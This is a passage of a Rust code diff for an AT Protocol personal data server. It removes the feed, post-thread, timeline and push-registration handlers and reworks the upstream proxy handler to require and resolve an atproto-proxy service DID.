// user's signing key is available.
if let Some(key_bytes) = auth_user.key_bytes.as_ref() {
match crate::auth::create_service_token(
&auth_user.did,
&resolved.did,
"app.bsky.feed.getFeed",
key_bytes,
) {
Ok(service_token) => {
request_builder =
request_builder.header("Authorization", format!("Bearer {}", service_token));
}
Err(e) => {
error!(error = ?e, "Failed to create service token for getFeed");
return ApiError::InternalError.into_response();
}
}
}
match request_builder.send().await {
Ok(resp) => {
// reqwest and axum use different http crate versions; convert via u16.
let status =
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
// First size gate: the advertised Content-Length (0 when absent).
let content_length = resp.content_length().unwrap_or(0);
if content_length > MAX_RESPONSE_SIZE {
error!(
content_length,
max = MAX_RESPONSE_SIZE,
"getFeed response too large"
);
return ApiError::UpstreamFailure.into_response();
}
let resp_headers = resp.headers().clone();
let body = match resp.bytes().await {
Ok(b) => {
// Second size gate: the actual body (Content-Length can lie).
if b.len() as u64 > MAX_RESPONSE_SIZE {
error!(len = b.len(), "getFeed response body exceeded limit");
return ApiError::UpstreamFailure.into_response();
}
b
}
Err(e) => {
error!(error = ?e, "Error reading getFeed response");
return ApiError::UpstreamFailure.into_response();
}
};
// Pass through status and content-type; body is forwarded verbatim.
let mut response_builder = axum::response::Response::builder().status(status);
if let Some(ct) = resp_headers.get("content-type") {
response_builder = response_builder.header("content-type", ct);
}
match response_builder.body(axum::body::Body::from(body)) {
Ok(r) => r,
Err(e) => {
error!(error = ?e, "Error building getFeed response");
ApiError::UpstreamFailure.into_response()
}
}
}
Err(e) => {
error!(error = ?e, "Error proxying getFeed");
if e.is_timeout() {
ApiError::UpstreamTimeout.into_response()
} else if e.is_connect() {
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
.into_response()
} else {
ApiError::UpstreamFailure.into_response()
}
}
}
}

View File

@@ -1,11 +0,0 @@
// app.bsky.feed XRPC handler modules for the PDS.
mod actor_likes;
mod author_feed;
mod custom_feed;
mod post_thread;
mod timeline;
// Re-export the handler functions so the router can reference them flatly.
pub use actor_likes::get_actor_likes;
pub use author_feed::get_author_feed;
pub use custom_feed::get_feed;
pub use post_thread::get_post_thread;
pub use timeline::get_timeline;

View File

@@ -1,315 +0,0 @@
use crate::api::read_after_write::{
PostRecord, PostView, RecordDescript, extract_repo_rev, format_local_post,
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry,
};
use crate::state::AppState;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::{Deserialize, Serialize};
use serde_json::{Value, json};
use std::collections::HashMap;
use tracing::warn;
/// Query parameters for `app.bsky.feed.getPostThread`.
#[derive(Deserialize)]
pub struct GetPostThreadParams {
// AT-URI of the post anchoring the thread.
pub uri: String,
pub depth: Option<u32>,
#[serde(rename = "parentHeight")]
pub parent_height: Option<u32>,
}
/// One resolved post node in a thread, mirroring
/// `app.bsky.feed.defs#threadViewPost`. Unknown fields survive in `extra`.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ThreadViewPost {
#[serde(rename = "$type")]
pub thread_type: Option<String>,
pub post: PostView,
#[serde(skip_serializing_if = "Option::is_none")]
pub parent: Option<Box<ThreadNode>>,
#[serde(skip_serializing_if = "Option::is_none")]
pub replies: Option<Vec<ThreadNode>>,
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
/// A thread tree node: a post, a tombstone for a missing post, or a
/// blocked-author marker. `untagged` — serde picks the variant whose
/// fields match the JSON shape.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
pub enum ThreadNode {
Post(Box<ThreadViewPost>),
NotFound(ThreadNotFound),
Blocked(ThreadBlocked),
}
/// Mirrors `app.bsky.feed.defs#notFoundPost`.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ThreadNotFound {
#[serde(rename = "$type")]
pub thread_type: String,
pub uri: String,
pub not_found: bool,
}
/// Mirrors `app.bsky.feed.defs#blockedPost`.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ThreadBlocked {
#[serde(rename = "$type")]
pub thread_type: String,
pub uri: String,
pub blocked: bool,
pub author: Value,
}
/// Top-level response body for `getPostThread`.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PostThreadOutput {
pub thread: ThreadNode,
#[serde(skip_serializing_if = "Option::is_none")]
pub threadgate: Option<Value>,
}
// Recursion cap for splicing local replies into a thread tree.
const MAX_THREAD_DEPTH: usize = 10;
/// Recursively splice locally-written replies into an AppView thread tree
/// (read-after-write).
///
/// At each node, local posts whose `reply.parent.uri` matches the node's
/// post URI are appended as new leaf reply nodes (no parent/replies of
/// their own yet); the function then recurses into ALL replies — including
/// the ones just added, so chains of local replies nest correctly.
/// Recursion stops at MAX_THREAD_DEPTH to bound work and guard against
/// cycles. All spliced replies are attributed to the single local author
/// (`author_did`/`author_handle`).
fn add_replies_to_thread(
thread: &mut ThreadViewPost,
local_posts: &[RecordDescript<PostRecord>],
author_did: &str,
author_handle: &str,
depth: usize,
) {
if depth >= MAX_THREAD_DEPTH {
return;
}
let thread_uri = &thread.post.uri;
let replies: Vec<_> = local_posts
.iter()
.filter(|p| {
p.record
.reply
.as_ref()
.and_then(|r| r.get("parent"))
.and_then(|parent| parent.get("uri"))
.and_then(|u| u.as_str())
== Some(thread_uri)
})
.map(|p| {
let post_view = format_local_post(p, author_did, author_handle, None);
ThreadNode::Post(Box::new(ThreadViewPost {
thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
post: post_view,
parent: None,
replies: None,
extra: HashMap::new(),
}))
})
.collect();
if !replies.is_empty() {
match &mut thread.replies {
Some(existing) => existing.extend(replies),
None => thread.replies = Some(replies),
}
}
if let Some(ref mut existing_replies) = thread.replies {
for reply in existing_replies.iter_mut() {
if let ThreadNode::Post(reply_thread) = reply {
add_replies_to_thread(
reply_thread,
local_posts,
author_did,
author_handle,
depth + 1,
);
}
}
}
}
/// XRPC handler for `app.bsky.feed.getPostThread` with read-after-write.
///
/// Proxies the query to the upstream AppView, then — for authenticated
/// callers — splices in local posts written after the repo rev the AppView
/// reports in its `atproto-repo-rev` response header. An upstream 404 is
/// handed to `handle_not_found`, which may still serve the caller's own
/// freshly written post.
pub async fn get_post_thread(
    State(state): State<AppState>,
    headers: axum::http::HeaderMap,
    Query(params): Query<GetPostThreadParams>,
) -> Response {
    // Best-effort auth: a missing or invalid token yields None, which only
    // disables the local-merge step rather than failing the request.
    let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
    let auth_user = if let Some(h) = auth_header {
        if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
            crate::auth::validate_bearer_token(&state.db, &token)
                .await
                .ok()
        } else {
            None
        }
    } else {
        None
    };
    let auth_did = auth_user.as_ref().map(|u| u.did.clone());
    let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
    // Forward only the recognized query parameters upstream.
    let mut query_params = HashMap::new();
    query_params.insert("uri".to_string(), params.uri.clone());
    if let Some(depth) = params.depth {
        query_params.insert("depth".to_string(), depth.to_string());
    }
    if let Some(parent_height) = params.parent_height {
        query_params.insert("parentHeight".to_string(), parent_height.to_string());
    }
    let proxy_result = match proxy_to_appview_via_registry(
        &state,
        "app.bsky.feed.getPostThread",
        &query_params,
        auth_did.as_deref().unwrap_or(""),
        auth_key_bytes.as_deref(),
    )
    .await
    {
        Ok(r) => r,
        Err(e) => return e,
    };
    // An upstream 404 may still be satisfiable from local records.
    if proxy_result.status == StatusCode::NOT_FOUND {
        return handle_not_found(&state, &params.uri, auth_did, &proxy_result.headers).await;
    }
    if !proxy_result.status.is_success() {
        return proxy_result.into_response();
    }
    // Without a repo rev we cannot tell what the upstream has indexed, so
    // pass its response through untouched.
    let rev = match extract_repo_rev(&proxy_result.headers) {
        Some(r) => r,
        None => return proxy_result.into_response(),
    };
    let mut thread_output: PostThreadOutput = match serde_json::from_slice(&proxy_result.body) {
        Ok(t) => t,
        Err(e) => {
            warn!("Failed to parse post thread response: {:?}", e);
            return proxy_result.into_response();
        }
    };
    // Unauthenticated callers get the upstream thread as-is.
    let requester_did = match auth_did {
        Some(d) => d,
        None => return (StatusCode::OK, Json(thread_output)).into_response(),
    };
    let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
        Ok(r) => r,
        Err(e) => {
            warn!("Failed to get local records: {}", e);
            return proxy_result.into_response();
        }
    };
    if local_records.posts.is_empty() {
        return (StatusCode::OK, Json(thread_output)).into_response();
    }
    // Handle lookup is best-effort; fall back to the DID on any failure.
    let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
        .fetch_optional(&state.db)
        .await
    {
        Ok(Some(h)) => h,
        Ok(None) => requester_did.clone(),
        Err(e) => {
            warn!("Database error fetching handle: {:?}", e);
            requester_did.clone()
        }
    };
    // Splice local replies into the upstream thread tree.
    if let ThreadNode::Post(ref mut thread_post) = thread_output.thread {
        add_replies_to_thread(
            thread_post,
            &local_records.posts,
            &requester_did,
            &handle,
            0,
        );
    }
    // Surface the staleness of the merged local data via a response header.
    let lag = get_local_lag(&local_records);
    format_munged_response(thread_output, lag)
}
/// Fallback for an upstream 404 on `getPostThread`: if the requested post
/// belongs to the authenticated caller and exists locally (written after
/// the AppView's last-seen repo rev), serve it as a single-node thread;
/// otherwise return the canonical 404.
async fn handle_not_found(
    state: &AppState,
    uri: &str,
    auth_did: Option<String>,
    headers: &axum::http::HeaderMap,
) -> Response {
    // Single source of truth for the canonical 404 payload, previously
    // duplicated six times throughout this function.
    fn not_found() -> Response {
        (
            StatusCode::NOT_FOUND,
            Json(json!({"error": "NotFound", "message": "Post not found"})),
        )
            .into_response()
    }
    // Without an upstream repo rev we cannot know which local records are
    // newer than the AppView's view, so nothing can be served locally.
    let rev = match extract_repo_rev(headers) {
        Some(r) => r,
        None => return not_found(),
    };
    // Read-after-write only applies to the authenticated author's own posts.
    let requester_did = match auth_did {
        Some(d) => d,
        None => return not_found(),
    };
    // Expected shape: at://<did>/<collection>/<rkey>
    let uri_parts: Vec<&str> = uri.trim_start_matches("at://").split('/').collect();
    if uri_parts.len() != 3 {
        return not_found();
    }
    let post_did = uri_parts[0];
    if post_did != requester_did {
        return not_found();
    }
    let local_records = match get_records_since_rev(state, &requester_did, &rev).await {
        Ok(r) => r,
        Err(_) => return not_found(),
    };
    let local_post = match local_records.posts.iter().find(|p| p.uri == uri) {
        Some(p) => p,
        None => return not_found(),
    };
    // Handle lookup is best-effort; fall back to the DID on any failure.
    let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
        .fetch_optional(&state.db)
        .await
    {
        Ok(Some(h)) => h,
        Ok(None) => requester_did.clone(),
        Err(e) => {
            warn!("Database error fetching handle: {:?}", e);
            requester_did.clone()
        }
    };
    let post_view = format_local_post(
        local_post,
        &requester_did,
        &handle,
        local_records.profile.as_ref(),
    );
    // Serve the local post as a minimal one-node thread.
    let thread = PostThreadOutput {
        thread: ThreadNode::Post(Box::new(ThreadViewPost {
            thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
            post: post_view,
            parent: None,
            replies: None,
            extra: HashMap::new(),
        })),
        threadgate: None,
    };
    let lag = get_local_lag(&local_records);
    format_munged_response(thread, lag)
}

View File

@@ -1,275 +0,0 @@
use crate::api::read_after_write::{
FeedOutput, FeedViewPost, PostView, extract_repo_rev, format_local_post,
format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed,
proxy_to_appview_via_registry,
};
use crate::state::AppState;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use jacquard_repo::storage::BlockStore;
use serde::Deserialize;
use serde_json::{Value, json};
use std::collections::HashMap;
use tracing::warn;
/// Query parameters for `app.bsky.feed.getTimeline`.
#[derive(Deserialize)]
pub struct GetTimelineParams {
    /// Optional feed algorithm identifier, forwarded verbatim upstream.
    pub algorithm: Option<String>,
    /// Maximum number of feed items requested.
    pub limit: Option<u32>,
    /// Opaque pagination cursor from a previous page.
    pub cursor: Option<String>,
}
/// XRPC handler for `app.bsky.feed.getTimeline`.
///
/// Requires authentication. When an upstream AppView is configured for this
/// method, the timeline is fetched from it and merged with recent local
/// writes; otherwise a purely local timeline is assembled.
pub async fn get_timeline(
    State(state): State<AppState>,
    headers: axum::http::HeaderMap,
    Query(params): Query<GetTimelineParams>,
) -> Response {
    let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
    let token = match crate::auth::extract_bearer_token_from_header(auth_header) {
        Some(t) => t,
        None => {
            return (
                StatusCode::UNAUTHORIZED,
                Json(json!({"error": "AuthenticationRequired"})),
            )
                .into_response();
        }
    };
    let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
        Ok(user) => user,
        Err(_) => {
            return (
                StatusCode::UNAUTHORIZED,
                Json(json!({"error": "AuthenticationFailed"})),
            )
                .into_response();
        }
    };
    // Prefer the upstream AppView path (read-after-write merge); fall back
    // to the local-only timeline when none is configured.
    let has_appview = state
        .appview_registry
        .get_appview_for_method("app.bsky.feed.getTimeline")
        .await
        .is_some();
    if has_appview {
        get_timeline_with_appview(
            &state,
            &params,
            &auth_user.did,
            auth_user.key_bytes.as_deref(),
        )
        .await
    } else {
        get_timeline_local_only(&state, &auth_user.did).await
    }
}
/// Fetch the timeline from the upstream AppView, then merge in the caller's
/// local posts that the AppView has not indexed yet (read-after-write).
///
/// Any failure along the merge path degrades gracefully by returning the
/// upstream response unmodified.
async fn get_timeline_with_appview(
    state: &AppState,
    params: &GetTimelineParams,
    auth_did: &str,
    auth_key_bytes: Option<&[u8]>,
) -> Response {
    // Forward only the recognized query parameters upstream.
    let mut query_params = HashMap::new();
    if let Some(algo) = &params.algorithm {
        query_params.insert("algorithm".to_string(), algo.clone());
    }
    if let Some(limit) = params.limit {
        query_params.insert("limit".to_string(), limit.to_string());
    }
    if let Some(cursor) = &params.cursor {
        query_params.insert("cursor".to_string(), cursor.clone());
    }
    let proxy_result = match proxy_to_appview_via_registry(
        state,
        "app.bsky.feed.getTimeline",
        &query_params,
        auth_did,
        auth_key_bytes,
    )
    .await
    {
        Ok(r) => r,
        Err(e) => return e,
    };
    if !proxy_result.status.is_success() {
        return proxy_result.into_response();
    }
    // Without a repo rev header we cannot compute the local diff.
    let rev = extract_repo_rev(&proxy_result.headers);
    if rev.is_none() {
        return proxy_result.into_response();
    }
    let rev = rev.unwrap();
    let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
        Ok(f) => f,
        Err(e) => {
            warn!("Failed to parse timeline response: {:?}", e);
            return proxy_result.into_response();
        }
    };
    let local_records = match get_records_since_rev(state, auth_did, &rev).await {
        Ok(r) => r,
        Err(e) => {
            warn!("Failed to get local records: {}", e);
            return proxy_result.into_response();
        }
    };
    // Nothing newer locally: the upstream feed is already complete.
    if local_records.count == 0 {
        return proxy_result.into_response();
    }
    // Handle lookup is best-effort; fall back to the DID on any failure.
    let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", auth_did)
        .fetch_optional(&state.db)
        .await
    {
        Ok(Some(h)) => h,
        Ok(None) => auth_did.to_string(),
        Err(e) => {
            warn!("Database error fetching handle: {:?}", e);
            auth_did.to_string()
        }
    };
    let local_posts: Vec<_> = local_records
        .posts
        .iter()
        .map(|p| format_local_post(p, auth_did, &handle, local_records.profile.as_ref()))
        .collect();
    insert_posts_into_feed(&mut feed_output.feed, local_posts);
    // Surface the staleness of the merged local data via a response header.
    let lag = get_local_lag(&local_records);
    format_munged_response(feed_output, lag)
}
/// Assemble a minimal timeline purely from local data: posts authored by
/// accounts the user follows, newest first, capped at 50. Used when no
/// upstream AppView is configured for `app.bsky.feed.getTimeline`.
///
/// Engagement counts are reported as zero since no indexer is available.
async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response {
    let user_id: uuid::Uuid =
        match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_did)
            .fetch_optional(&state.db)
            .await
        {
            Ok(Some(id)) => id,
            Ok(None) => {
                // The caller authenticated, so a missing row is an internal
                // inconsistency rather than a client error.
                return (
                    StatusCode::INTERNAL_SERVER_ERROR,
                    Json(json!({"error": "InternalError", "message": "User not found"})),
                )
                    .into_response();
            }
            Err(e) => {
                warn!("Database error fetching user: {:?}", e);
                return (
                    StatusCode::INTERNAL_SERVER_ERROR,
                    Json(json!({"error": "InternalError", "message": "Database error"})),
                )
                    .into_response();
            }
        };
    // Follow records are stored as content-addressed blocks; fetch the CIDs
    // first, then decode each block to extract the followed DID.
    let follows_query = sqlx::query!(
        "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000",
        user_id
    )
    .fetch_all(&state.db)
    .await;
    let follow_cids: Vec<String> = match follows_query {
        Ok(rows) => rows.iter().map(|r| r.record_cid.clone()).collect(),
        Err(_) => {
            return (
                StatusCode::INTERNAL_SERVER_ERROR,
                Json(json!({"error": "InternalError"})),
            )
                .into_response();
        }
    };
    // NOTE(review): one block-store round trip per follow record; a batched
    // get_many would cut latency here — confirm the store supports it.
    let mut followed_dids: Vec<String> = Vec::new();
    for cid_str in follow_cids {
        let cid = match cid_str.parse::<cid::Cid>() {
            Ok(c) => c,
            Err(_) => continue,
        };
        let block_bytes = match state.block_store.get(&cid).await {
            Ok(Some(b)) => b,
            _ => continue,
        };
        let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) {
            Ok(v) => v,
            Err(_) => continue,
        };
        // `subject` of a follow record is the followed account's DID.
        if let Some(subject) = record.get("subject").and_then(|s| s.as_str()) {
            followed_dids.push(subject.to_string());
        }
    }
    // No follows: return an empty feed rather than an error.
    if followed_dids.is_empty() {
        return (
            StatusCode::OK,
            Json(FeedOutput {
                feed: vec![],
                cursor: None,
            }),
        )
            .into_response();
    }
    let posts_result = sqlx::query!(
        "SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle
         FROM records r
         JOIN repos rp ON r.repo_id = rp.user_id
         JOIN users u ON rp.user_id = u.id
         WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post'
         ORDER BY r.created_at DESC
         LIMIT 50",
        &followed_dids
    )
    .fetch_all(&state.db)
    .await;
    let posts = match posts_result {
        Ok(rows) => rows,
        Err(_) => {
            return (
                StatusCode::INTERNAL_SERVER_ERROR,
                Json(json!({"error": "InternalError"})),
            )
                .into_response();
        }
    };
    // Decode each post block and build the feed view; rows whose block is
    // missing or undecodable are silently skipped.
    let mut feed: Vec<FeedViewPost> = Vec::new();
    for row in posts {
        let record_cid: String = row.record_cid;
        let rkey: String = row.rkey;
        let created_at: chrono::DateTime<chrono::Utc> = row.created_at;
        let author_did: String = row.did;
        let author_handle: String = row.handle;
        let cid = match record_cid.parse::<cid::Cid>() {
            Ok(c) => c,
            Err(_) => continue,
        };
        let block_bytes = match state.block_store.get(&cid).await {
            Ok(Some(b)) => b,
            _ => continue,
        };
        let record: Value = match serde_ipld_dagcbor::from_slice(&block_bytes) {
            Ok(v) => v,
            Err(_) => continue,
        };
        let uri = format!("at://{}/app.bsky.feed.post/{}", author_did, rkey);
        feed.push(FeedViewPost {
            post: PostView {
                uri,
                cid: record_cid,
                author: crate::api::read_after_write::AuthorView {
                    did: author_did,
                    handle: author_handle,
                    display_name: None,
                    avatar: None,
                    extra: HashMap::new(),
                },
                record,
                indexed_at: created_at.to_rfc3339(),
                embed: None,
                // No indexer locally, so all engagement counts are zero.
                reply_count: 0,
                repost_count: 0,
                like_count: 0,
                quote_count: 0,
                extra: HashMap::new(),
            },
            reply: None,
            reason: None,
            feed_context: None,
            extra: HashMap::new(),
        });
    }
    (StatusCode::OK, Json(FeedOutput { feed, cursor: None })).into_response()
}

View File

@@ -1,14 +1,11 @@
pub mod actor;
pub mod admin;
pub mod error;
pub mod feed;
pub mod identity;
pub mod moderation;
pub mod notification;
pub mod notification_prefs;
pub mod proxy;
pub mod proxy_client;
pub mod read_after_write;
pub mod repo;
pub mod server;
pub mod temp;

View File

@@ -1,3 +0,0 @@
mod register_push;
pub use register_push::register_push;

View File

@@ -1,153 +0,0 @@
use crate::api::ApiError;
use crate::api::proxy_client::{is_ssrf_safe, proxy_client, validate_did};
use crate::state::AppState;
use axum::{
Json,
extract::State,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use serde::Deserialize;
use serde_json::json;
use tracing::{error, info};
/// Request body for `app.bsky.notification.registerPush`.
#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct RegisterPushInput {
    /// DID of the push notification service to register with.
    pub service_did: String,
    /// Device push token (opaque to this server; max 4096 bytes).
    pub token: String,
    /// Client platform; must be one of `VALID_PLATFORMS`.
    pub platform: String,
    /// Application identifier (max 256 bytes).
    pub app_id: String,
}
/// Platforms accepted in `RegisterPushInput::platform`.
const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"];
/// Proxy `app.bsky.notification.registerPush` to the configured upstream
/// AppView on behalf of the authenticated user.
///
/// Flow: authenticate the caller, validate the payload, resolve the
/// upstream AppView, mint a service token signed with the user's decrypted
/// repo key, then forward the registration.
pub async fn register_push(
    State(state): State<AppState>,
    headers: HeaderMap,
    Json(input): Json<RegisterPushInput>,
) -> Response {
    // Validate every client-supplied field in one place; returns the
    // ready-made error response so the caller can bail immediately.
    fn validate_input(input: &RegisterPushInput) -> Result<(), Response> {
        if let Err(e) = validate_did(&input.service_did) {
            return Err(
                ApiError::InvalidRequest(format!("Invalid serviceDid: {}", e)).into_response()
            );
        }
        if input.token.is_empty() || input.token.len() > 4096 {
            return Err(ApiError::InvalidRequest("Invalid push token".to_string()).into_response());
        }
        if !VALID_PLATFORMS.contains(&input.platform.as_str()) {
            return Err(ApiError::InvalidRequest(format!(
                "Invalid platform. Must be one of: {}",
                VALID_PLATFORMS.join(", ")
            ))
            .into_response());
        }
        if input.app_id.is_empty() || input.app_id.len() > 256 {
            return Err(ApiError::InvalidRequest("Invalid appId".to_string()).into_response());
        }
        Ok(())
    }
    let token = match crate::auth::extract_bearer_token_from_header(
        headers.get("Authorization").and_then(|h| h.to_str().ok()),
    ) {
        Some(t) => t,
        None => return ApiError::AuthenticationRequired.into_response(),
    };
    let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
        Ok(user) => user,
        Err(e) => return ApiError::from(e).into_response(),
    };
    if let Err(resp) = validate_input(&input) {
        return resp;
    }
    let resolved = match state
        .appview_registry
        .get_appview_for_method("app.bsky.notification.registerPush")
        .await
    {
        Some(r) => r,
        None => {
            return ApiError::UpstreamUnavailable(
                "No upstream AppView configured for app.bsky.notification.registerPush".to_string(),
            )
            .into_response();
        }
    };
    // Defense in depth: never forward to a private/loopback address, even
    // if DID resolution was poisoned.
    if let Err(e) = is_ssrf_safe(&resolved.url) {
        error!("SSRF check failed for appview URL: {}", e);
        return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e))
            .into_response();
    }
    // Load and decrypt the user's signing key so we can mint a service
    // token scoped to this method and audience.
    let key_row = match sqlx::query!(
        "SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1",
        auth_user.did
    )
    .fetch_optional(&state.db)
    .await
    {
        Ok(Some(row)) => row,
        Ok(None) => {
            error!(did = %auth_user.did, "No signing key found for user");
            return ApiError::InternalError.into_response();
        }
        Err(e) => {
            error!(error = ?e, "Database error fetching signing key");
            return ApiError::DatabaseError.into_response();
        }
    };
    let decrypted_key =
        match crate::config::decrypt_key(&key_row.key_bytes, key_row.encryption_version) {
            Ok(k) => k,
            Err(e) => {
                error!(error = ?e, "Failed to decrypt signing key");
                return ApiError::InternalError.into_response();
            }
        };
    let service_token = match crate::auth::create_service_token(
        &auth_user.did,
        &input.service_did,
        "app.bsky.notification.registerPush",
        &decrypted_key,
    ) {
        Ok(t) => t,
        Err(e) => {
            error!(error = ?e, "Failed to create service token");
            return ApiError::InternalError.into_response();
        }
    };
    let target_url = format!("{}/xrpc/app.bsky.notification.registerPush", resolved.url);
    info!(
        target = %target_url,
        service_did = %input.service_did,
        platform = %input.platform,
        "Proxying registerPush request"
    );
    let client = proxy_client();
    let request_body = json!({
        "serviceDid": input.service_did,
        "token": input.token,
        "platform": input.platform,
        "appId": input.app_id
    });
    match client
        .post(&target_url)
        .header("Authorization", format!("Bearer {}", service_token))
        .header("Content-Type", "application/json")
        .json(&request_body)
        .send()
        .await
    {
        Ok(resp) => {
            let status =
                StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
            if status.is_success() {
                // registerPush has no response body on success.
                StatusCode::OK.into_response()
            } else {
                let body = resp.bytes().await.unwrap_or_default();
                error!(
                    status = %status,
                    "registerPush upstream error"
                );
                ApiError::from_upstream_response(status.as_u16(), &body).into_response()
            }
        }
        Err(e) => {
            error!(error = ?e, "Error proxying registerPush");
            // Map transport failures to distinct upstream error categories.
            if e.is_timeout() {
                ApiError::UpstreamTimeout.into_response()
            } else if e.is_connect() {
                ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
                    .into_response()
            } else {
                ApiError::UpstreamFailure.into_response()
            }
        }
    }
}

View File

@@ -1,11 +1,13 @@
use crate::api::proxy_client::proxy_client;
use crate::state::AppState;
use axum::{
Json,
body::Bytes,
extract::{Path, RawQuery, State},
http::{HeaderMap, Method, StatusCode},
response::{IntoResponse, Response},
};
use serde_json::json;
use tracing::{error, info, warn};
pub async fn proxy_handler(
@@ -16,65 +18,80 @@ pub async fn proxy_handler(
RawQuery(query): RawQuery,
body: Bytes,
) -> Response {
let proxy_header = headers
let proxy_header = match headers
.get("atproto-proxy")
.and_then(|h| h.to_str().ok())
.map(|s| s.to_string());
let (appview_url, service_aud) = match &proxy_header {
Some(did_str) => {
let did_without_fragment = did_str.split('#').next().unwrap_or(did_str).to_string();
match state.appview_registry.resolve_appview_did(&did_without_fragment).await {
Some(resolved) => (resolved.url, Some(resolved.did)),
None => {
error!(did = %did_str, "Could not resolve service DID");
return (StatusCode::BAD_GATEWAY, "Could not resolve service DID")
.into_response();
}
}
}
{
Some(h) => h.to_string(),
None => {
match state.appview_registry.get_appview_for_method(&method).await {
Some(resolved) => (resolved.url, Some(resolved.did)),
None => {
return (StatusCode::BAD_GATEWAY, "No upstream AppView configured for this method")
.into_response();
}
}
return (
StatusCode::BAD_REQUEST,
Json(json!({
"error": "InvalidRequest",
"message": "Missing required atproto-proxy header"
})),
)
.into_response();
}
};
let did = proxy_header.split('#').next().unwrap_or(&proxy_header);
let resolved = match state.did_resolver.resolve_did(did).await {
Some(r) => r,
None => {
error!(did = %did, "Could not resolve service DID");
return (
StatusCode::BAD_GATEWAY,
Json(json!({
"error": "UpstreamFailure",
"message": "Could not resolve service DID"
})),
)
.into_response();
}
};
let target_url = match &query {
Some(q) => format!("{}/xrpc/{}?{}", appview_url, method, q),
None => format!("{}/xrpc/{}", appview_url, method),
Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q),
None => format!("{}/xrpc/{}", resolved.url, method),
};
info!("Proxying {} request to {}", method_verb, target_url);
let client = proxy_client();
let mut request_builder = client.request(method_verb, &target_url);
let mut auth_header_val = headers.get("Authorization").cloned();
if let Some(aud) = &service_aud {
if let Some(token) = crate::auth::extract_bearer_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
) {
match crate::auth::validate_bearer_token(&state.db, &token).await {
Ok(auth_user) => {
if let Some(key_bytes) = auth_user.key_bytes {
match crate::auth::create_service_token(&auth_user.did, aud, &method, &key_bytes) {
Ok(new_token) => {
if let Ok(val) = axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token)) {
auth_header_val = Some(val);
}
}
Err(e) => {
warn!("Failed to create service token: {:?}", e);
if let Some(token) = crate::auth::extract_bearer_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
) {
match crate::auth::validate_bearer_token(&state.db, &token).await {
Ok(auth_user) => {
if let Some(key_bytes) = auth_user.key_bytes {
match crate::auth::create_service_token(
&auth_user.did,
&resolved.did,
&method,
&key_bytes,
) {
Ok(new_token) => {
if let Ok(val) =
axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token))
{
auth_header_val = Some(val);
}
}
Err(e) => {
warn!("Failed to create service token: {:?}", e);
}
}
}
Err(e) => {
warn!("Token validation failed: {:?}", e);
}
}
Err(e) => {
warn!("Token validation failed: {:?}", e);
}
}
}
if let Some(val) = auth_header_val {
request_builder = request_builder.header("Authorization", val);
}
@@ -86,6 +103,7 @@ pub async fn proxy_handler(
if !body.is_empty() {
request_builder = request_builder.body(body);
}
match request_builder.send().await {
Ok(resp) => {
let status = resp.status();

View File

@@ -1,456 +0,0 @@
use crate::api::ApiError;
use crate::api::proxy_client::{
MAX_RESPONSE_SIZE, RESPONSE_HEADERS_TO_FORWARD, is_ssrf_safe, proxy_client,
};
use crate::state::AppState;
use axum::{
Json,
http::{HeaderMap, HeaderValue, StatusCode},
response::{IntoResponse, Response},
};
use bytes::Bytes;
use chrono::{DateTime, Utc};
use cid::Cid;
use jacquard_repo::storage::BlockStore;
use serde::{Deserialize, Serialize};
use serde_json::Value;
use std::collections::HashMap;
use tracing::{error, info, warn};
use uuid::Uuid;
/// Response header in which the upstream AppView reports the repo revision
/// it had indexed when answering.
pub const REPO_REV_HEADER: &str = "atproto-repo-rev";
/// Response header reporting, in milliseconds, how far behind the
/// merged-in local records are relative to now.
pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag";
/// Partial decode of an `app.bsky.feed.post` record from the repo.
/// Fields this struct does not model survive round-trips via `extra`.
